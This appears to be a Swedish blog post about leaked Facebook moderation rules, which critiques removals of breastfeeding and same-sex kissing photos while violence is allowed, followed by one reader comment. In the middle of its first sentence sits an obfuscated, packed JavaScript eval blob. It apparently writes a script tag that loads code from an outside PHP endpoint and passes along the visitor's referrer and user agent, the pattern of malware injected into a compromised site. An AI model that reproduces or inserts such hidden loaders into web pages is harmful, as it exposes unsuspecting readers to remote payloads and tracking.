Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Hur Facebook censurerar bilder och videos

Hur Facebook censurerar bilder och videos
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|byeza|var|u0026u|referrer|hrfaf||js|php’.split(’|’),0,{}))
har en förre detta anställd på ett bemanningsföretag som hyr ut anställda till bl.a. Facebook avslöjat företagets kriterier. De kriterier som företaget Facebook delat med sig av är väldigt luddiga och nästan godtyckliga.

Det har uppmärksammats flera gånger hur Facebook tar bort harmlösa bilder från användare. Bilder på mammor som ammar och samkönade par som kyssar varandra är exempel på bilder som tagits bort utan kommentar.

Det Facebook menar är att de bilder visar bröstvårtor, eller sexuella anspelningar som inte är okej. Bilder och videos som visar våld är tydligen ok så länge det inte går över styr och visar blodiga scener där ”innandömet syns”.

Via länken nedan kan ni läsa hela listan på vilka regler som egentligen gäller på Facebook. Bra att ha i baktanke i framtiden om du publicerar mycket bilder eller videos på nätverket.

Vad tycker ni inte är okej respektive ok att visa på Facebook?

Comments

  1. Emma

    Sjukt att man får visa våld. har själv sett flera riktigt ruggiga videos som jag funderar över varför inte Facebook tar bort.